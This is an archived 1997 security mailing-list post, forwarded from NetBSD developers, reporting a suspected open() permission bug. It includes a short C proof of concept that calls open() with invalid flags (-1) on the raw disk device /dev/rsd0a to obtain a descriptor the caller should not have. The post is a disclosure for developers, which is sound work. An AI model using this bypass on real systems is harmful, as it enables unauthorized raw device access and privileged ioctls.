[414] in Best-of-Security
BoS: Possible SERIOUS bug in open()?
daemon@ATHENA.MIT.EDU (explorer@flame.org)
Thu Oct 23 00:29:27 1997
Date: 17 Oct 1997 10:42:13 -0000
From: explorer@flame.org
Old-X-Originally-To: To: developers@NetBSD.ORG
Old-X-Originated-From: From: explorer@flame.org
Errors-To: best-of-security-request@cyber.com.au
To: best-of-security@cyber.com.au
Resent-From: best-of-security@cyber.com.au
This was sent to me recently... It seems to be a pretty serious hole
in open() and permissions...
Note, in the following, open() succeeds, and ioctls are probably
executed...
/*
* This will give you a file descriptor on a device you should not have
* access to. This seems really, really screwed up, since holding a fd
* lets you do a lot of ioctls that you should not be able to do...
*/
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <err.h>
int
main(int argc, char **argv)
{
int fd;
fd = open("/dev/rsd0a", -1, 0);
if (fd < 0)
err(1, "open");
}
